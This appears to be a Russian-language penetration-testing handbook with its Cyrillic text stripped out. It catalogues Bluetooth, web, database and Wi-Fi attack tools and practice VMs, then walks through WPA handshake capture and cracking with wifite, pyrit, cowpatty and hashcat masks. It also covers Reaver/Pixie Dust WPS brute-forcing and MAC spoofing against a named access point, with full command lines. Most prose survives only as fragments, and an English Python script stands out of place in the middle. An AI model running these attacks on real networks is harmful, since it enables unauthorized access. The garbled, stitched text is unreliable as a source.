Blooover II , Java (J2ME).


Blooover II J2ME
Blooover II
.
.

BTScanner XP Bluetooth
BTScanner Microsoft Windows XP, bluecove
( JSR-82 Bluetooth API Java).

BlueSpam bluetooth
BlueSpam ( ) OBEX.
. ,


, SD/MMC card,
/PALM/programs/BlueSpam/Send/
( .jpg )
.

Bluetooth
BTCrawler . J2ME,
MIDP 2.0 JSR082 (Java API Bluetooth)

Bluediving Bluetooth.
Bluebug, BlueSnarf, BlueSnarf++, BlueSmack,
Bluetooth, AT
Bluediving RFCOMM carwhisperer, bss,
L2CAP, L2CAP, RFCOMM
greenplaque scanning mode (
hci ).

Bluesnarfer
Bluetooth .
Bluesnarfer
, PDA .
, , .

Arachni ,
- " ".
Arachni
,
, .

Burp Suite
Burp Suite
-.

CAL9000 -
, -
CAL9000 . CAL9000
,
.

CAT
CAT - ,
.


CookieDigger
-.
CookieDigger
, -
.

DIRB . (/ )
DIRB . ,
- .

Fiddler -,
HTTP(S) . Fiddler
Fiddler
HTTP(S) ,
"" .

Gamja XSS( ) SQL-


URL .
Gamja , ? Gamja
[ XSS, , SQL-
].

-
Grendel-Scan .
.

HTTrack
.
HTTrack
, ,
HTML, .

LiLith , Perl -.
- <form>,
LiLith
,
SQL- .

Nikto - (GPL),
Nikto2 -
, 6500 /CGI.

Paros ,
Paros -.
Java.

Powerfuzzer Powerfuzzer
- ( HTTP


),
,
-.

proxyScan.pl

ProxyScan.pl
. HTTP , GET,
CONNECT, HEAD, .

,
-,

Ratproxy
,
,
web 2.0.

,
. ..
ScanEx
, XSS
.

Scrawlr, HP Web Security Research Group MSRC,


, SQL- . Scrawlr -
Scrawlr
-
SQL Injection.

Springenwerk
Springenwerk
(XSS), Python.

sqlmap
,
Sqlmap
SQL-,
.

sqlsus MySQL-
Sqlsus
, Perl.

Windows, ssl
THCSSLCheck
.

w3af -.
w3af -
, -


Wapiti -.
" " (
Wapiti ), .. ,
, ,
.

Webfuzzer ,
Webfuzzer , -.
" ".

WebGoat - J2EE,
WebGoat OWASP,
-.

Websecurify Suite -,
Websecurify
-.

WebSlayer - -
, ,
(, , ..),
WebSlayer
GET POST ,
(/), ..
.

WhatWeb -. ,
-?. WhatWeb -,
WhatWeb (CMS), ,
/ , JavaScript , -
.

Wikto Nikto Windows ,


Fuzzy, ,
Wikto
Google
/ HTTP .

WSDigger ,
McAfee Foundstone -
WSDigger " " ( )
, . WSDigger
, -.


XSSploit
, Python.
XSSploit
XSS
.

Fireforce Firefox, -
Fireforce GET POST . Fireforce
, .

Netsparker -
.
Netsparker ,

.

Havij SQL-,
Havij SQL-
-.

Oracle Berkeley DB ,
,
Berkeley DB
, ,
.

Database browser .
,
Database browser
, sql ,
.

db2utils db2.
Db2utils : db2disco, db2fakesrv
db2getprofile.

Oracle Auditing Tools ,


Oracle Auditing

Tools
Oracle.

Oscanner Oscanner Oracle,


Java.
.

SQLAT ,
MS SQL .
SQL Auditing Tools , .
, ,
SAM.

THC
, Oracle. THC
THC-ORACLE

Oracle .

OrakelCrackert Oracle
thc- 11g, Oracle.
orakelcrackert11g Oracle 11g
SHA1.

DBPwAudit Java ,

DBPwAudit .

JDBC jdbc.

Python
MYSQLAudit
MySQL.

sqlininja -,
Microsoft SQL Server .

sqlininja
. sqlninja SQL-,
,
.

GreenSQL
, SQL-.
GreenSql
GreenSQL
MySQL PostgreSQL.


The Metasploit Framework


Metasploit
,
Framework
.

OpenVAS ,
OpenVAS
.

Nessus ,
Nessus
.

Porkbind ,

Porkbind
(, sub.host.dom,
host.dom).

Immunity CANVAS Immunity ,


,
Canvas

.

Social-Engineer Toolkit (SET)


Social-
" ". SET
EngineerToolkit
http://www.social-engineer.org
(SET)
.

Acunetix web vulnerability scanner


-,
, , ,
Acunetix
.
, SQL-,
.

RIPS , PHP,
RIPS
PHP .

Rapid7 NeXpose ,
,
Rapid7 NeXpose , , ,
, , .
Rapid7 Metasploit .


VulnDetector -

VulnDetector -. VulnDetector
(XSS) SQL- (SQLI)
-, .

DSSS blind/error SQLi ,


,
(, HTTP,
Damn Small SQLi

Scanner
).
, ,
.

CAT.NET ,

CAT.NET , ,
(XSS), SQL- XPath
.

Peach SmartFuzzer,
, . Peach
Peach Fuzzer
PeachPit, ,
.

GFI LanGuard ,
,
GFI LanGuard .
IP .
5 IP .

Microsoft Baseline Security Analyzer (MBSA)


, IT
,
MBSA

Microsoft
.

Damn Vulnerable Damn Vulnerable Web App (DVWA) -


Web Application PHP/MySQL, .


(DVWA)
, -
-
/ /
- .

Damn Vulnerable Linux (DVL) Linux ,


? ,
Damn Vulnerable , ,
Linux , .
DVL
.

Metasploitable
Linux. VM
Metasploitable
,
.

Kioptrix VM .
,
Kioptrix VM ).

.

HoneyDrive (OVA)
Xubuntu Desktop 12.04 32- .

HoneyDrive
"" honeypot. Kippo SSH honeypot, Dionaea malware
honeypot, Honeyd low-interaction honeypot, Glastopf web honeypot
Wordpot, Thug honeyclient .

Badstore.net , ,
Badstore -
.

InsecureWebApp -,
.
OWASP Insecure
,
Web App Project
,
.

VulnApp VulnApp ASP.net BSD,

,

.

Vicnum OWASP, -
, ,
OWASP Vicnum .
-, ,
sql .

OWASP Broken The Broken Web Applications (BWA) Project


Web Applications
Project .

LAMPSecurity
LAMPSecurity ,
Linux, Apache, PHP, MySQL.


.
Virtual Hacking Lab / /
. live
iso .

The Web Application Vulnerability Scanner Evaluation Project


-,
, -
WAVSEP
.
-,
-.

Moth VMware -
,
Moth -,
(SCA),
-.

Stanford SecuriBench

SecuriBench
.
.91a - Java.

NETinVM NETinVM VMware

VirtualBox,
User-mode Linux (UML) (Linux
), , ,

VMware VirtualBox.

Web Security Dojo


-.
VirtualBox VMware. Dojo
Dojo
, ,
,
.

Live CD

BackTrack Linux
,
BackTrack
, , .
Kali Linux.

Kali Linux ( BackTrack) Debian



.
Kali Linux
, ARM,

.

BackBox Linux, Ubuntu.


.
,
, ;
BackBox
,


.

The Samurai Web Testing Framework live linux,



Samurai . CD
, -
.

Katana ,

.
, ,
Katana , , ,
. Katana
100 Windows;
Wireshark, Metasploit, NMAP, Cain & Abel
.

, Ubuntu
blackbuntu 10.10,
.

Bugtraq , 2.6.38,
. Bugtraq
Live DVD USB ,
Bugtraq , ,
,
,
.

ISO live CD/DVD (NST Live) Fedora.


Network
Security
Toolkit (NST) x86/x86_64
.

Pentoo LiveCD
Gentoo.
Pentoo
,
.

BlackArch Arch. 600


BlackArch. The BlackArch live ISO
BlackArch , dwm, Awesome, Fluxbox,
Openbox, wmii, i3 Spectrwm. BlackArch
Arch.

17. Offensive Security


( Kali Linux)
Git searchsploit:

(The Exploit Database)


,
.
,
,
.
.
, , ,
. ,
.
,
.
(Exploit Database Binary Exploits).
,
. Kali Linux .
, , ,
31583.txt. 31583
. 31583.docx ,
. ,
, , , , ,
. , , Kali
,
.
Exploit Database Binary Exploits -
, .
.
searchsploit,
.
, 3 :
Git
searchsploit Kali Linux
- https://www.exploit-db.com/
searchsploit Kali Linux Git , :

, Git (-u, -t, -
w, colour, id)

- www.exploit-db.com -
. - , .
- , .

searchsploit
Kali ,
searchsploit.
, searchsploit ( Kali,
), Metasploit Exploitation Framework searchsploit
. ,
.
, searchsploit ( ) Linux Mint
( Ubuntu Debian).

opt:
1| mkdir opt

:
1| cd opt

git, :
1| sudo apt-get install git

:
1| git clone https://github.com/offensive-security/exploit-database.git


searchsploit :
1| ~/opt/exploit-database/searchsploit

:
1| ~/opt/exploit-database/searchsploit wordpress sql

.. wordpress sql:

,
searchsploit, Kali (, Kali
exploitdb):
1| mial@mint ~/opt $ find /home/mial/opt/exploit-database/platforms/ -type f | wc -l
33888
2| root@WebWare-Kali:~# find /usr/share/exploitdb/platforms/ -type f | wc -l
98309
3| root@WebWare-Kali:~# find /usr/share/exploitdb/platforms/ -type f | wc -l
33824

2
:

65 ! , -
- .
:
1| ~/opt/exploit-database/searchsploit -u

3.
18. Kali Linux USB Wi-Fi
(2015)
wirelesshack.org, SVNSVNSVN
Kali Linux
USB Wi-Fi ( ).
(),
,
.
, Kali,
.
Kali ,
,
. :
Atheros AR9271
Ralink RT3070

Ralink RT3572
Realtek 8187L ( G )
- Wi-Fi,
, ,
Kali.
, .
.
, ,
, .
,
Wi-Fi G ( ).
N, G
N G.
N.
, . USB
, ,
5 dbi 9 dbi.
USB Wi-Fi Kali.
Alfa 2015 .
Kali Linux USB Wi-Fi .

, Ralink RT3070

Alfa AWUS036NH 2.4 GHz

Alfa AWUS036NEH 2.4 GHz

Panda PAU05 2.4 GHz

, AR9271

Alfa AWUS036NHA

TP-LINK TL-WN722N 2.4 GHz

, RT3572
Alfa AWUS051NH 2.4 GHz 5.8 GHz
,
. 2.4 GHz 5.8
GHz.

USB G,
Realtek 8187L
USB ,
G .
2-5 .
,
N.

Alfa AWUS036H USB 2.4 GHz

Netgear WG111v2 USB 2.4 GHz

Sabrent NT-WGHU USB 2.4 GHz

, Kali
(48 dBi)
Ralink 3070, Kali.
Windows, Windows 7 Mac.
, , ,
N.
High Power SignalKing Signal King 48DBI

4G Kali Linux

NooElec NESDR Mini 2 USB RTL-SDR ADS-B Receiver Set, RTL2832U &
R820T2 Tuner, MCX Input.
RTL-SDR 4G Kali Linux.
, LTE GSM,
, .
, 25 (
). , , .

19. Wi-Fi (WPA/WPA2), pyrit


cowpatty Kali Linux
: .
, , , ,
.
,
.
,
Wi-Fi.
- ,
Kali Linux USB Wi-Fi .
Wi-Fi (WPA/WPA2), pyrit cowpatty cuda
calpp Kali Linux
Wifi WPA/WPA2 ,
. .

,
. ,
Wifi WPA/WPA2,
pyrit cowpatty Kali Linux, ,
cuda calpp (cal++), WiFite
. Kali Linux
10 Wifi WPA/WPA2
pyrit, cowpatty WiFite, AMD.
, .
AMD ATI, .
NVIDIA:
1. NVIDIA Kali Linux NVIDIA
Linux
2. NVIDIA CUDA Pyrit Kali Linux CUDA, Pyrit
Cpyrit-cuda
AMD:
1. fglrx AMD ATI fglrx Kali Linux
2. AMD APP SDK Kali Linux
3. CAL++ Kali Linux
4. Pyrit
, Wifi WPA
WPA2, HashCat cudaHashcat oclHashcat
Wifi WPA WPA2 . Hashcat ,
, ,
. ,
,
. Hashcat
Wifi WPA/WPA2
MD5, phpBB, MySQL SHA1 . Hashcat
, 1 2 , 12
. 4 , 3 .
,
, ,
. .
: ,
. , Kali
Linux, , . .
802.11 Kali Linux ( USB).
, ,
-, .

handshake WiFite
WiFite, Aircrack-ng, ?
.
:
1| airmon-ng start wlan0
Kali Linux:
1| wifite -wpa
:
1| wifite wpa2
(wep, wpa or wpa2),
, :
1| wifite
, (
). CLIENTS. ,
clients, .
.
all , , .
1,2 ENTER.
, clients,
, . . . ,
. , , ,
, - .
, 1 2 ENTER, WiFite .
ENTER, .
, 1 - , . .
. CTRL+C .
, WIfite, . . :
1| What do you want to do?
2| [c]ontinue attacking targets
3| [e]xit completely.
c, , e . ,
. c .
1 2. , . .
. ,
, ,
, .
, (handshake) .
.
/root/hs/BigPond_58-98-35-E9-2B-8D.cap.

, Wifite
.
, ,
:
1. .
2. .
crunch
oclhashcat
, . . 20% ( )
.
.

.cap Wi-Fi
, .
Kali Linux ,
. . Kali Linux.
root:
1| cp /usr/share/wordlists/rockyou.txt.gz .
:
1| gunzip rockyou.txt.gz
, , WPA2 8
, , ,
8 63 ( ,
, ). ,
newrockyou.txt:
1| cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt
, :
1| wc -l newrockyou.txt
9606665 .
:
1| wc -l rockyou.txt
14344392 . , , ,
.
, wpa.lst:
1| mv newrockyou.txt wpa.lst

ESSID Pyrit
ESSID Pyrit:
1| pyrit -e BigPond create_essid
: , , NetComm Wireless,
:
1| pyrit -e 'NetComm Wireless' create_essid
,
, ESSID, Pyrit.
Pyrit
, ESSID Pyrit,
.

wpa.lst Pyrit:
1| pyrit -i /root/wpa.lst import_passwords

Pyrit, (batch)
, :
1| pyrit batch
,
15019 PMKs ( CAL++).
CUDA NVIDIA, CAL++
AMD, .
100%, 94
. ,
.
, .

.
1. Pyrit
2. Cowpatty
(handshake) , Pyrit
. :
1| pyrit -r hs/BigPond_58-98-35-E9-2B-8D.cap attack_db
. ,
, .
159159186.00 PMK's 1 . ,
, .

: NVIDIA
CUDA Cpyrit-CUDA. ,
. , .
Pyrit, "
Pyrit: IOError: libpcap-error while reading: truncated dump file; tried to read 424
captured bytes, only got 259".
(handshake) ,
Pyrit
crunch,
( ), :
1| pyrit -r hs/BigPond_58-98-35-E9-2B-8D.cap -i /root/wpa.lst attack_passthrough
? 7807 PMKs . .
Cowpatty
cowpatty, cowpatty
.
cowpatty
, .
Pyrit cowpatty airolib-ng.
, cowpatty , .
cowpatty. ,
, cowpatty:
1| pyrit -e BigPond -o cow.out export_cowpatty

: WPA WPA2 PSK cowpatty


, cowpatty,
WPA2/PSK. :
1| cowpatty -d cow.out -s BigPond -r hs/BigPond_58-98-35-E9-2B-8D.cap
, ,
. .
,
.
, .
, . 164823.00 /.
: cowpatty ( ),
/ , 2 . airolib-ng,
.
(handshake) cowpatty, Pyrit
Pyrit.

cow.out Pyrit:
1| pyrit -r hs/BigPond_58-98-35-E9-2B-8D.cap -i /root/cow.out attack_cowpatty
? 31683811 PMKs . ,
Pyrit attack_db. , ,
(batch) .
Pyrit
, , essid :
1| pyrit -e BigPond delete_essid

, Wifi WPA/WPA2
Reaver-WPS. ,
.

20. Wifi WPA/WPA2


Reaver
- ,
19. Kali Linux USB Wi-Fi
Reaver
Reaver WPS (Wifi Protected Setup) .
WPA/WPA2. Reaver
WPS,
WPS. , Reaver
WPA/WPA2 () 4-10 ,
. ,
WPS .
.. Reaver 2012 ,
. https://code.google.com/p/reaver-wps-fork/.
2014 .
. ( 2015 )
Reaver.
https://github.com/t6x/reaver-wps-fork-t6x. ,
Pixie Dust WPS.
Ralink, Broadcom Realtek. ,
, Wiire.
Reaver , .
.
, , Wi-Fi
Wi-Fi (WPA/WPA2), pyrit
cowpatty Kali Linux. (

Wifite) .
.
Wi-Fi :
()
WPS.
.
-,
. -, , ,
, .
WPA2/WPA Hashcat Kali Linux ( Wi-Fi ),
, .
, , ,
. Hashcat
, Wifi WPA/WPA2,
MD5, phpBB, MySQL, SHA1 .

Reaver WPS
, , WPS.
,
( .. WPA PSK).
, . , ,
Reaver , , .
: .
- .
: , .
10^8 (100,000,000) .
, , . . ,
,
10^7 (10,000,000).
, ,
, . ,
10^4 (10,000) , 10^3
(1,000), . . .
Reaver , .
, , 11,000. , Reaver

.
, ,
10 .

Reaver
Kali Linux, . (Reaver, libpcap libsqlite3).

Reaver
:
1| airmon-ng

, . wlan0.
airmon-ng start <_>
:
1| airmon-ng start wlan0

Reaver : BSSID
. , , BSSID :
1| airodump-ng --wps wlan0mon

, Kitty, BSSID 4C:72:B9:FE:B8:0C.


Reaver' .
airodump-ng :
1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C

SSID ( , SSID )
Reaver', :
1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -c 4 -e Kitty
, , Reaver
. , ,
:
1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --fixed
5 . ,
( 1 ):
1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -t 2
1 .
.
:
1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -d 0
WPS , 5 ,
. ,
, Reaver 315 (5
15 ) -, WPS
.
:
1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --lock-delay=250
, .
,
:
1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -vv
M5 M7 WPS 0.1 .
, (
1 ):
1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -T .5
WPS ,
, , NACK, .
, M5/M7, NACK
. , , NACK'
( ),
. , Reaver
, NACK' :
1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --nack
EAP FAIL
WPS, . , ,
, :
1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --eap-terminate

10 WPS,
. ,
,
,
:

1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --fail-wait=360


, Reaver 1 .
-d 0 ,
:

1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -d 0

, , dh-small.
Reaver -,
:

1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --dh-small

Reaver, Pixiewps -K 1
Pixiewps
. Reaver t6x
Pixie Dust Kali Linux.
. .. , Reaver.
Pixiewps
. -K 1. , Reaver
Pixiewps. ..
:

1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -K 1

Reaver t6x
Pixie Dust.
:
Reaver ;
: -K // pixie-dust reaver; -H // pixiedust-
log reaver; -P // pixiedust-loop reaver

MAC
/ MAC . Reaver
MAC mac, , MAC
, . . .
MAC (
wlan0mon) . MAC
. :
1| # ifconfig wlan0 down
2| # ifconfig wlan0 hw ether 04:DE:AD:BE:EF:45
3| # ifconfig wlan0 up
4| # airmon-ng start wlan0
5| # reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -vv --mac=04:DE:AD:BE:EF:45

21. Reaver t6x


Pixie Dust
When poor design meets poor implementation.
.
( Reaver, WPS)
: Kali Linux .
" ". .
- ,
19. Kali Linux USB Wi-Fi
Reaver
Reaver WPS (Wifi Protected Setup)
. Reaver WPS,
WPS.
, Reaver WPA/WPA2
() 4-10 , . ,
WPS .
- https://code.google.com/p/reaver-wps/.
Pro .
Reaver
.. Reaver 2012 ,
. https://code.google.com/p/reaver-wps-fork/.
2014 .
. ( 2015 )
Reaver.
https://github.com/t6x/reaver-wps-fork-t6x. ,
Pixie Dust WPS.
Ralink, Broadcom Realtek.
, , Wiire.
Reaver, Pixiewps.
, Kali Linux: , ,
.
Pixiewps Kali Linux
.
:
1| apt-get install libpcap-dev pixiewps

Pixiewps Debian, Mint, Ubuntu


Pixiewps:
1| sudo apt-get install libssl-dev
.
zip- Download ZIP.
1| cd Downloads
2| unzip pixiewps-master.zip
3| cd pixiewps-master/src
4| make
5| gcc -std=c99 -o pixiewps pixiewps.c random_r.c -lssl -lcrypto
6| make install
:
1| install -D pixiewps /usr/local/bin/pixiewps
2| install -m 755 pixiewps /usr/local/bin

Reaver t6x Kali Linux


, Kali Linux ,
" ". .

Reaver t6x Debian, Mint, Ubuntu


Reaver:
1| apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps
Pixiewps by Wiire , ,
.

Reaver
:
1| git clone https://github.com/t6x/reaver-wps-fork-t6x
:
1| wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip && unzip master.zip
:
1| cd reaver-wps-fork-t6x*/
2| cd src/
3| ./configure
4| make
:
1| sudo make install

Reaver
Reaver ,
.
Reaver , .
, , :
1| reaver -v
2| Reaver v1.4 WiFi Protected Setup Attack Tool
3| Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
, :
:
1| -i, --interface=<wlan>
2| -b, --bssid=<mac> BSSID
:
1| -m, --mac=<mac> MAC
2| -e, --essid=<ssid> ESSID
3| -c, --channel=<channel> 802.11
( -f)
4| -o, --out-file=<file> - [stdout]
5| -s, --session=<file>
6| -C, --exec=<command>

7| -D, --daemonize reaver
8| -a, --auto

9| -f, --fixed
10| -5, --5ghz 5GHz 802.11
11| -v, --verbose (-vv
)
12| -q, --quiet
13| -K --pixie-dust=<> [1] pixiewps PKE, PKR, E-Hash1, E-Hash2,
E-Nonce Authkey (Ralink, Broadcom, Realtek)
14| -Z, --no-auto-pass reaver
WPA, pixiewps

15| -h, --help
:
1| -p, --pin=<wps pin> 4 8 WPS
2| -d, --delay=<> [1]
3| -l, --lock-delay=<seconds> ,
[60]
4| -g, --max-attempts=<>
5| -x, --fail-wait=<> 10
[0]
6| -r, --recurring-delay=<x:y> y x
7| -t, --timeout=<> [5]
8| -T, --m57-timeout=<> M5/M7 [0.20]
9| -A, --no-associate (
)
10| -N, --no-nacks NACK

11| -S, --dh-small DH

12| -L, --ignore-locks ,

13| -E, --eap-terminate WPS EAP FAIL
14| -n, --nack NACK [Auto]
15| -w, --win7 Windows 7 registrar [False]
16| -X, --exhaustive
[False]
17| -1, --p1-index
[False]
18| -2, --p2-index
[False]
19| -P, --pixiedust-loop PixieLoop ( M4
M3) [False]

20| -W, --generate-pin devttys0


[1] Belkin [2] D-Link
21| -H, --pixiedust-log
PixieHashes
:
1| reaver -i mon0 -b 00:AA:BB:11:22:33 -vv -K 1
-K // pixie-dust reaver
-K 1 pixiewps PKE, PKR, E-Hash1, E-Hash2, E-Nonce Authkey. pixiewps
Ralink, Broadcom Realtek.
* : Realtek, DH (-S)
-H // pixiedust-log reaver
-H PixieHashes,
. -vvv, ,
, -K 1 & -P.
bssid (MAC) .pixie.
PixieDust,
pixiewps.
.
( chmod +x <_>).
-P // pixiedust-loop reaver
(-P) reaver reaver ,
M4 WPS, , ,
. PixieHash,
pixiewps, .
:
/
, ..
,
.
,
PixieHash,
.
Wash
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
:
1| -i, --interface=<iface>
2| -f, --file [FILE1 FILE2 FILE3 ...]

:
1| -c, --channel=<num> [auto]
2| -o, --out-file=<file>
3| -n, --probes=<num>
[15]
4| -D, --daemonize wash
5| -C, --ignore-fcs
6| -5, --5ghz 5GHz 802.11
7| -s, --scan
8| -u, --survey [default]
9| -P, --file-output-piped Wash
. . wash x|y|z...
10| -g, --get-chipset reaver

11| -h, --help
:
1| wash -i mon0
-g // get-chipset
-g wash reaver
.
, ,
. . reaver
(30 ).

22. WPA2/WPA Hashcat Kali


Linux ( Wi-Fi )
- ,
19. Kali Linux USB Wi-Fi
.
Wi-Fi .
. - ,
. 20
().
, ,
, - (
Hashcat). .
. : 1) ; 2) (
,
). ,
. ))

, - ,
maskprocessor.
Hashcat (cudaHashcat oclHashcat) Kali Linux
() WPA2 WPA. Hashcat .cap .
.cap .hccap.
.
Hashcat
Hashcat, ,
, .
, .
Linux, OSX Windows,
. Hashcat
,
Microsoft LM Hashes, MD4, MD5, SHA, Unix Crypt, MySQL,
Cisco PIX ( ).
Hashcat , . .
, ,
hashcat (,
1Password).
Hashcat
Hashcat
. :
- ()









,
Hashcat .
Hashcat
Hashcat :
Hashcat

oclHashcat

, Hashcat,
, GPU.
oclHashcat,
MD5, SHA1 . ,
GPU. Bcrypt
. - ,
( ), oclHashcat
Hashcat.
Hashcat Linux, OSX Windows. oclHashcat Linux Windows
- OpenCL OSX.


Kali Linux 1.1.0a Radeon HD 7870M Series,
rockyou .
WPA2 WPA Hashcat ( .cap-
) cudaHashcat oclHashcat Hashcat Kali Linux.
oclHashcat, . . AMD GPU.
NVIDIA GPU, cudahashcat.
, CUDA
NVIDIA fglrx AMD. .
NVIDIA:
NVIDIA Kali Linux NVIDIA
Linux
NVIDIA CUDA Pyrit Kali Linux CUDA, Pyrit
Cpyrit-cuda
AMD:
fglrx AMD ATI fglrx Kali Linux
AMD APP SDK Kali Linux
CAL++ Kali Linux
Pyrit

Hashcat WPA WPA2


Pyrit , WPA2 WPA.
Hashcat WPA2 WPA?
?
Hashcat
. , , .
Hashcat
WPA2 WPA.


1| ?l = abcdefghijklmnopqrstuvwxyz
2| ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
3| ?d = 0123456789
4| ?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
5| ?a = ?l?u?d?s
6| ?b = 0x00 - 0xff


, 12345678.
?d?d?d?d?d?d?d?d
, 12345678
23456789 01567891. , .

, ABCFEFGH LKHJHIOP ZBTGYHQS . .,
:
?u?u?u?u?u?u?u?u
.

, : abcdefgh dfghpoiu
bnmiopty . ., :
?l?l?l?l?l?l?l?l
. ,
.

, a1b2c3d4 p9o8i7u6 n4j2k5l6 . .
( ), :
?l?d?l?d?l?d?l?d

, A1B2C3D4 P9O8I7U6 N4J2K5L6 . .
( ), :
?u?d?u?d?u?d?u?d
, ,

,
:

?a?a?a?a?a?a?a?a
: ?a , .
, .
.

- ,
.
. .
, ,
abc, - .
:
abc?l?l?l?l?l
abc?u?u?u?u?u
abc?d?d?d?d?d
abc?l?u??d??d?l
abc?d?d?l?u?l
- , 125 .
.
cudaHashcat oclHashcat Hashcat Kali Linux WPA2 WPA .
,
. .
, , ,
, ,
.
: Abcde123
:
?u?l?l?l?l?d?d?d
.

Hashcat
.
:
1| --custom-charset1=CS
2| --custom-charset2=CS
3| --custom-charset3=CS
4| --custom-charset4=CS
CS . CS
, . .
, , .

: -1, -2, -3 -4.



hashcat ( .hcchr,
/, ).
:


,
abcdefghijklmnopqrstuvwxyz0123456789 (aka lalpha-numeric):
1| -1 abcdefghijklmnopqrstuvwxyz0123456789
2| -1 abcdefghijklmnopqrstuvwxyz?d
3| -1 ?l0123456789
4| -1 ?l?d
5| -1 loweralpha_numeric.hcchr # , + (abcdefghijklmnopqrstuvwxyz0123456789)
, 0123456789abcdef:
-1 ?dabcdef
7- ascii charset (aka
mixalpha-numeric-all-space):
-1 ?l?d?s?u
(-1)
, :
-1 charsets/special/Russian/ru_ISO-8859-5-special.hcchr
Kali Linux
.hcchr :
1| tree /usr/share/maskprocessor/charsets/
:
1| tree /usr/share/hashcat/charsets/
: abc, 8 ,
.
, :
, ,
:
-1 ?l?d?u
:
abc?1?1?1?1?1
, , 1. l .
. ()
. , ,

Wifi WPA2 WPA pyrit cowpatty Kali


Linux. ,
.
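The mask grammar laid out above (?l, ?u, ?d, ?s, ?a, ?b, literal prefixes such as abc, and the -1..-4 custom charsets referenced as ?1..?4) is easiest to check by computing the keyspace each mask defines, which is also what tells a defender how a password policy holds up against a mask attack at a measured rate such as the PMK/s figures quoted earlier. The following Python script is an added example, not code from the book or from Hashcat; it reimplements that grammar, assumes Hashcat's built-in ?s set of 33 printable ASCII specials (space included), and takes the custom sets as a dict keyed by the digit of -1..-4.

```python
"""Keyspace estimator for Hashcat-style masks.

Added example, not code from the book or from Hashcat.  It implements the
mask grammar described in the text: ?l ?u ?d ?s ?a ?b, ?? for a literal '?',
literal characters, and the custom charsets -1..-4 referenced as ?1..?4.
"""
from __future__ import annotations

import string

# Hashcat's built-in charsets; ?s is assumed to be the 33 printable ASCII
# specials (space included), ?b every raw byte value 0x00-0xff.
BUILTIN: dict[str, str] = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
    "b": "".join(chr(i) for i in range(256)),
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]


def expand_charset(spec: str, custom: dict[str, str] | None = None) -> str:
    """Expand a charset spec such as '?l?d' or '?dabcdef' into its literal
    characters, deduplicated with order preserved ('?dabcdef' is the 16 hex
    digits, not 22 characters)."""
    custom = custom or {}
    chars: list[str] = []
    i = 0
    while i < len(spec):
        if spec[i] != "?":
            chars.append(spec[i])
            i += 1
            continue
        if i + 1 >= len(spec):
            raise ValueError("dangling '?' in %r" % spec)
        key = spec[i + 1]
        if key == "?":
            chars.append("?")
        elif key in BUILTIN:
            chars.extend(BUILTIN[key])
        elif key in custom:
            chars.extend(custom[key])
        else:
            raise ValueError("unknown charset ?%s" % key)
        i += 2
    return "".join(dict.fromkeys(chars))


def expand_custom(raw: dict[str, str]) -> dict[str, str]:
    """Expand the -1..-4 definitions in order, so -2 may refer to ?1 and so on."""
    done: dict[str, str] = {}
    for key in sorted(raw):
        done[key] = expand_charset(raw[key], done)
    return done


def parse_mask(mask: str, custom: dict[str, str] | None = None) -> list[str]:
    """Return one charset per password position; a literal character is a
    one-element charset, so 'abc?d' has four positions."""
    sets = expand_custom(custom or {})
    positions: list[str] = []
    i = 0
    while i < len(mask):
        if mask[i] == "?":
            positions.append(expand_charset(mask[i:i + 2], sets))
            i += 2
        else:
            positions.append(mask[i])
            i += 1
    return positions


def keyspace(mask: str, custom: dict[str, str] | None = None) -> int:
    """Number of candidates the mask generates (product of the position sizes)."""
    total = 1
    for charset in parse_mask(mask, custom):
        total *= len(charset)
    return total


def seconds_to_exhaust(mask: str, rate: float, custom: dict[str, str] | None = None) -> float:
    """Worst-case time to try every candidate at `rate` guesses per second."""
    return keyspace(mask, custom) / rate


if __name__ == "__main__":
    # Masks from the text, at a constructed rate of 15,000 PMK/s.
    for mask, custom in [
        ("?d?d?d?d?d?d?d?d", {}),
        ("?u?l?l?l?l?d?d?d", {}),
        ("abc?1?1?1?1?1", {"1": "?l?d?u"}),
        ("?a?a?a?a?a?a?a?a", {}),
    ]:
        n = keyspace(mask, custom)
        days = seconds_to_exhaust(mask, 15000, custom) / 86400
        print("%-20s %-16s %22d candidates %14.1f days" % (mask, custom or "", n, days))
```

The deduplication in expand_charset matters for the equivalence claims in the text: `-1 ?dabcdef`, `-1 ?l?d` and `-1 abcdefghijklmnopqrstuvwxyz0123456789` all collapse to the same set, and a mask like `abc?1?1?1?1?1` with `-1 ?l?d?u` yields 62^5 candidates rather than the 95^8 of the all-?a mask, which is the whole point of choosing a mask from what is known about the policy.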
.cap wpaclean
.cap ,
Hashcat (cudaHashcat oclHashcat).
.cap Kali Linux.
1| wpaclean <out.cap> <in.cap>
, , , ,
<out.cap> <in.cap>. , <in.cap> <out.cap>.
, .
:
1| wpaclean hs/out.cap hs/Narasu_3E-83-E7-E9-2B-8D.cap

.cap .hccap
, Hashcat (cudaHashcat
oclHashcat).
.hccap aircrack-ng
-J
1| aircrack-ng <out.cap> -J <out.hccap>
-J J j.
:
